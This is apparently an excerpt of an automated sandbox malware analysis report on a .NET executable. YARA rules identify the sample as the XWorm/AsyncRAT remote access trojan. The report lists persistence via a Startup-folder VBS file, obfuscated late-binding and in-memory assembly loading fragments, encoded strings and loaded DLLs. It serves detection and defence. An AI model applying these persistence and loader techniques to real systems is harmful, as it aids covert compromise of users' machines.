                  Source: 0.2.Ref#103052.exe.26ba7b8.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                  Source: 0.2.Ref#103052.exe.26ba7b8.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 0.2.Ref#103052.exe.26ba7b8.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                  Source: 0.2.Ref#103052.exe.26ba7b8.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 00000008.00000002.3122065596.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 00000000.00000002.2266018230.00000000025F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 0.2.Ref#103052.exe.26ba7b8.0.raw.unpack, hMY5B4KaPYBa602NktZ1e4wVF.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Ref#103052.exe.26ba7b8.0.raw.unpack, hMY5B4KaPYBa602NktZ1e4wVF.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Ref#103052.exe.26ba7b8.0.raw.unpack, jK41xlYzptzDvBwid77hpLBxe.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Ref#103052.exe.3dcff78.4.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                  Source: 0.2.Ref#103052.exe.3dcff78.4.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                  Source: 0.2.Ref#103052.exe.3dcff78.4.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                  Source: 0.2.Ref#103052.exe.3dcff78.4.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                  Source: 0.2.Ref#103052.exe.26ba7b8.0.raw.unpack, mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.csBase64 encoded string: 'qrWW57nvRyn00elFuCjeH95KEzu0nXD9a1EjNFsSKWI2JzFd5o/JI2uySuuacGCA', '+bL0Nu45rwxtL0cMX4ZDcUSHH3rmdtZKKBX0tVrBX2mcmOmjJAcRtFN7nI8gGYKb', 'XbCAm7wk1EHocambvU0XTCBTwiKRR/zkfWRJY9ookY+YTfzwlIcF1A1ctpAhu+T9'
                  Source: 0.2.Ref#103052.exe.3dcff78.4.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                  Source: 0.2.Ref#103052.exe.3dcff78.4.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                  Source: 0.2.Ref#103052.exe.3dcff78.4.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 0.2.Ref#103052.exe.3dcff78.4.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 0.2.Ref#103052.exe.3dcff78.4.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: 0.2.Ref#103052.exe.26ba7b8.0.raw.unpack, UyBaVrh3yB8AUovlO5XfdkL7t5iY1o8XuCf70QNOaAGbj0Iy7nKlDMcpODCvfW8bQM4dJA5qWzXqC8F1.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.Ref#103052.exe.26ba7b8.0.raw.unpack, UyBaVrh3yB8AUovlO5XfdkL7t5iY1o8XuCf70QNOaAGbj0Iy7nKlDMcpODCvfW8bQM4dJA5qWzXqC8F1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Ref#103052.exe.3dcff78.4.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@4/3@1/1
                  Source: C:\Users\user\Desktop\Ref#103052.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wnuth.vbsJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeMutant created: NULL
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3848:64:WilError_03
                  Source: C:\Users\user\Desktop\Ref#103052.exeMutant created: \Sessions\1\BaseNamedObjects\qnzzEC3SI3U6Qmbo
                  Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\acd93c9f-b5c5-4989-a6c2-8cac12c8c547Jump to behavior
                  Source: Ref#103052.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: Ref#103052.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                  Source: C:\Users\user\Desktop\Ref#103052.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Ref#103052.exeVirustotal: Detection: 56%
                  Source: Ref#103052.exeReversingLabs: Detection: 57%
                  Source: C:\Users\user\Desktop\Ref#103052.exeFile read: C:\Users\user\Desktop\Ref#103052.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\Ref#103052.exe "C:\Users\user\Desktop\Ref#103052.exe"
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess created: C:\Users\user\Desktop\Ref#103052.exe "C:\Users\user\Desktop\Ref#103052.exe"
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1240 -s 928
                  Source: C:\Users\user\Desktop\Ref#103052.exeProcess created: C:\Users\user\Desktop\Ref#103052.exe "C:\Users\user\Desktop\Ref#103052.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Users\user\Desktop\Ref#103052.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: Ref#103052.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: Ref#103052.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: \??\C:\Windows\dll\System.pdb source: Ref#103052.exe, 00000008.00000002.3123485015.0000000001059000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: Ref#103052.exe, 00000008.00000002.3123485015.0000000001059000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: Ref#103052.exe, 00000008.00000002.3123485015.0000000001092000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Ref#103052.exe, 00000000.00000002.2280909559.00000000063A0000.00000004.08000000.00040000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2274026597.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2274026597.0000000003D61000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\Desktop\Ref#103052.PDBri source: Ref#103052.exe, 00000008.00000002.3123485015.000000000109C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Ref#103052.exe, 00000000.00000002.2280909559.00000000063A0000.00000004.08000000.00040000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2274026597.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2274026597.0000000003D61000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: n,C:\Windows\System.pdb source: Ref#103052.exe, 00000008.00000002.3122393969.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.pdbft source: Ref#103052.exe, 00000008.00000002.3123485015.0000000001059000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: Ref#103052.exe, 00000000.00000002.2274026597.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2280393203.00000000062A0000.00000004.08000000.00040000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2274026597.0000000003D61000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.pdb[ source: Ref#103052.exe, 00000008.00000002.3123485015.00000000010B0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: Ref#103052.exe, 00000000.00000002.2274026597.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2280393203.00000000062A0000.00000004.08000000.00040000.00000000.sdmp, Ref#103052.exe, 00000000.00000002.2274026597.0000000003D61000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: Ref#103052.exe, 00000008.00000002.3123485015.0000000001042000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.pdb source: Ref#103052.exe, 00000008.00000002.3123485015.0000000001092000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ##.pdb source: Ref#103052.exe, 00000008.00000002.3122393969.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  .NET source code contains method to dynamically call methods (often used by packers)
                  Source: 0.2.Ref#103052.exe.26ba7b8.0.raw.unpack, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.s0WM2rftlZrRlhpT9idv7uV2rEAk3RlDIRYceKaW8hMQZWHZ3if6pKKdSwrO3i6SmI8jN8qTehoPLePY,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.K9kh2nJimtKDkF7jGN6eOd0ZBVsYLZ7YTiqXJa0VWb7ngnSoPpI3YU89NdMotITNtPSuHNkei72vyLFV,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y._1VsNF3cuRvQjwiilTAyyEblbspHKx7OA31GBuBBfIztGXCQx9m6QqF40eYLT22g5Bszm2KIQ5LVg1IZ1,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.ympPucUHwJnSfU7tayEsRSXhtDbUO82bWiMAWHZeuvxaIszE8LvDTEq6E7WsvXRLFcNZeKLM5vQwdPie,hMY5B4KaPYBa602NktZ1e4wVF._8LzAMDP2lSg0J0oH5GGzV7TVx()}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: 0.2.Ref#103052.exe.26ba7b8.0.raw.unpack, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{vUyM4H5F9bQnCqdcynRb0XuhdS5eCilG7xt1z5yPlwwhppbQajtCs1pZGPsb3HWP6iZs04PXwEcvK3tt[2],hMY5B4KaPYBa602NktZ1e4wVF._4kByA7KtFVCEau2DpQjG31KJu(Convert.FromBase64String(vUyM4H5F9bQnCqdcynRb0XuhdS5eCilG7xt1z5yPlwwhppbQajtCs1pZGPsb3HWP6iZs04PXwEcvK3tt[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  .NET source code contains potential unpacker
                  Source: 0.2.Ref#103052.exe.3d61d18.1.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                  Source: 0.2.Ref#103052.exe.3d61d18.1.raw.unpack, ListDecorator.cs.Net Code: Read
                  Source: 0.2.Ref#103052.exe.3d61d18.1.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                  Source: 0.2.Ref#103052.exe.3d61d18.1.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                  Source: 0.2.Ref#103052.exe.3d61d18.1.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                  Source: 0.2.Ref#103052.exe.26ba7b8.0.raw.unpack, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs.Net Code: _2p6j7rWUglfKjEQmV1usPbb2Iq3Km88KbCQhArOcO2DdVu3z1iXlaobQIGnfcG78E98Ic4dpWbXMKVzG System.AppDomain.Load(byte[])
                  Source: 0.2.Ref#103052.exe.26ba7b8.0.raw.unpack, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs.Net Code: _0cq7P1zgeKpKr1Nm3vyeUK7d9RSqotiVfYzpCAzOrWjSysNfbKxfipgCwuJfa17sqoJFCv4kUfnhgpR6 System.AppDomain.Load(byte[])
                  Source: 0.2.Ref#103052.exe.26ba7b8.0.raw.unpack, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs.Net Code: _0cq7P1zgeKpKr1Nm3vyeUK7d9RSqotiVfYzpCAzOrWjSysNfbKxfipgCwuJfa17sqoJFCv4kUfnhgpR6
                  Source: 0.2.Ref#103052.exe.3dcff78.4.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 0.2.Ref#103052.exe.3dcff78.4.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 0.2.Ref#103052.exe.3dcff78.4.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                  Source: 0.2.Ref#103052.exe.62a0000.11.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                  Source: 0.2.Ref#103052.exe.62a0000.11.raw.unpack, ListDecorator.cs.Net Code: Read
                  Source: 0.2.Ref#103052.exe.62a0000.11.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                  Source: 0.2.Ref#103052.exe.62a0000.11.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                  Source: 0.2.Ref#103052.exe.62a0000.11.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                  Source: 0.2.Ref#103052.exe.3d11cf8.5.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                  Source: 0.2.Ref#103052.exe.3d11cf8.5.raw.unpack, ListDecorator.cs.Net Code: Read
                  Source: 0.2.Ref#103052.exe.3d11cf8.5.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                  Source: 0.2.Ref#103052.exe.3d11cf8.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                  Source: 0.2.Ref#103052.exe.3d11cf8.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                  Yara detected Costura Assembly Loader
                  Source: Yara matchFile source: 0.2.Ref#103052.exe.3c8eeb8.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Ref#103052.exe.61a0000.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Ref#103052.exe.61a0000.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Ref#103052.exe.3c8eeb8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Ref#103052.exe.374d5a0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2274026597.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2280032784.00000000061A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2266018230.00000000025F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2274026597.0000000003541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Ref#103052.exe PID: 7060, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_0611E098 push es; iretd 0_2_0611E0A4
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_06121F58 push es; iretd 0_2_06121F64
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_06129369 push es; ret 0_2_061293B0
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_062966F8 push 980572BDh; ret 0_2_06296705
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_0629D2B0 push es; ret 0_2_0629D360
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_0629039F push ebp; iretd 0_2_062903A0
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_06293F5F push es; ret 0_2_06294008
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_06290CF1 push eax; ret 0_2_06290CF2
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_062F26AF push cs; iretd 0_2_062F26C7
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_062F46EA push es; iretd 0_2_062F46EC
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_062F47CD push es; iretd 0_2_062F47D8
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_0642CA50 pushad ; iretd 0_2_0642CA5D
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_06422328 push es; ret 0_2_06422354
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_064223A1 push es; retf 0_2_064223AC
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_06425D29 push 300645A9h; retf 0_2_06425D35
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_065D7695 push esp; ret 0_2_065D76AD
                  Source: C:\Users\user\Desktop\Ref#103052.exeCode function: 0_2_065D09E1 push esp; ret 0_2_065D0A03
                  Source: 0.2.Ref#103052.exe.26ba7b8.0.raw.unpack, lYfWlfT3r7Vqz88tbfAuCjKRe.csHigh entropy of concatenated method names: 'kOQ5Z9rwMXQQwsQd9U5wJwGgA', '_5IpOq6mDTAwrp2FTSgHzNUZ6U', 'cPbIlTDjsb7RjMx8Bnmb5BlYC', 'EGhvBkBPenl8anH8LxHEcrnawvcgNbGzlNbtSGDZidi', 'qgCXUhcFghV4Gn09Ux0zMANUpUDIbjpm3b5c3qcS7V8', 'SiVz1GzNIesBAG06rJk9SKNR72BDYDvWSYP7WvEdiQH', '_6Zu4a6W2P7MN3pmUPK9UfKjMO1giZz44TN0pivow5UZ', 'PlbLO24x9CCU8itVg1JImlB5d4peV1YS2Vsh7vULx3N', 'JDQPF1e80PPfAgh8UwKHm2qZ3SrjjTSDyRimnu0c1qC', 'Kv47HDZaPJK92FJq6cVgfoBr0skPYGt056SQmCHp3NL'
                  Source: 0.2.Ref#103052.exe.26ba7b8.0.raw.unpack, ZQNenIJ11v1eDG5LYuP2OrWwHq14u0rIiwxz57g1fXStOp9D7M6RmGJ4YKEdVQ5EUUTCTZv7PDDfMtzT.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'b6mTyduYMePwCfdIKIVaMUPHF', 'EJWHS3NIZk5yrShQV6UbTF7iG', 'HQWI8F3Evo98iZXl7nPp03wUd', 'uVfhorrceO8DDy2jZSCP4sjid'
                  Source: 0.2.Ref#103052.exe.26ba7b8.0.raw.unpack, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.csHigh entropy of concatenated method names: 'WOKIIYrThZTCGte1A75mpaGYcGTIovkGFkNhoWEfchfLgJza6BJD6Bwb8ldtUxY27BZGcEQ6Ko22VL0v', '_2p6j7rWUglfKjEQmV1usPbb2Iq3Km88KbCQhArOcO2DdVu3z1iXlaobQIGnfcG78E98Ic4dpWbXMKVzG', 'ct6moaFmxzSEwIBSw5rpr8RVGDQyhSzLEcWeKPn3GlTwBRfSaIJQGP4EqzmGtbrppHVemlokSFDIFISr', 'jUfEW1HLDovEWv1ZZ2zNiS7OUyhKjeBJXG86gTqRm21d1n8vbqzTfp312I43KRCVmeRCgSzDJZYBLYjh', 'gFbqVU5GBTH4rOArujDduUnOvWjfsKUedwGzlcoMMdxUxFKDjxuRbkOJ169CFT9IuRiDSHyxz88kCye0', '_639np3BrkfPYmPr9VF1r5l8eJcR7h6v7PQmNuTkTMjKBkD9o6eKvLwfYP4KVxtbHN8XIPtcwCW848AA5', '_4oih0kLo1v9w1DiU35KzsmEf23mDdPUhb668zPHv7Z9yZOdcwmAGhhBWdUpnyLSHCBVu8Td7QNPAcVDZ', 'EUaHo9pU6vromjIH1zi7gXzYtQGwuar6S7KHNbk1HrSucXpIoSL7I0aHw5NdgXG3IFRHPeNrXOw8so1J', 'QeaFyp7eNMwyVwtHpKxgZRxvsNRfRibyJWARpIr7sDRV2kDKRCjnVVuiToPBdap401IV879hVobpmuqK', 'V41AXdXRfohEGR0ea2I1kBGrbFeFb7frm4Y3YZ1FB2QHwHi368a6UPrH3ZgAmiKBBqkh0cS3TNxAQoXi'
                  Source: 0.2.Ref#103052.exe.26ba7b8.0.raw.unpack, hMY5B4KaPYBa602NktZ1e4wVF.csHigh entropy of concatenated method names: 'WxO6haGbmISoUIXjKWGw5O0f6', '_1KdIk1gCCecm5eb5zn8kSjK12', 'PxlPQIsDfwQvPbKvl2sd3YzC2', 'PQy6sJgSzykRZLc0OQgp3FF40', 'EILjjH71J0z6TCdH4iiqNMin5', 'QyEqwp20c4swV4XJJGsgNpnyq', 'LcILsujkk2zDB1CPWPVFG2jJx', 'uJOKVr0lx53sKgbsneL3CqWRx', 'f9VWvJM0sfsTL6ygejd44nBUT', 'LlvOkQs0TO79zqf2p1q3KccCh'
                  Source: 0.2.Ref#103052.exe.26ba7b8.0.raw.unpack, jK41xlYzptzDvBwid77hpLBxe.csHigh entropy of concatenated method names: 'OKzUlm8N3VhAQNuXvYaHxIv0O', '_2jsV4Dr67P8WIcVYQJEwwfWilcqMU7dWO5FaXzBdwnR', 't33agRLkVoIksIMaeHSr25f5MenSU0vXFDLuVr5rAWm', 'BVIgd1nQM1laXCOCutMUo4uF0HHRkd5UhpQp2AsEeS6', 'Ra43n4P4GpAazsLfytyMIOCicKFs70KMZtEfMom59my'
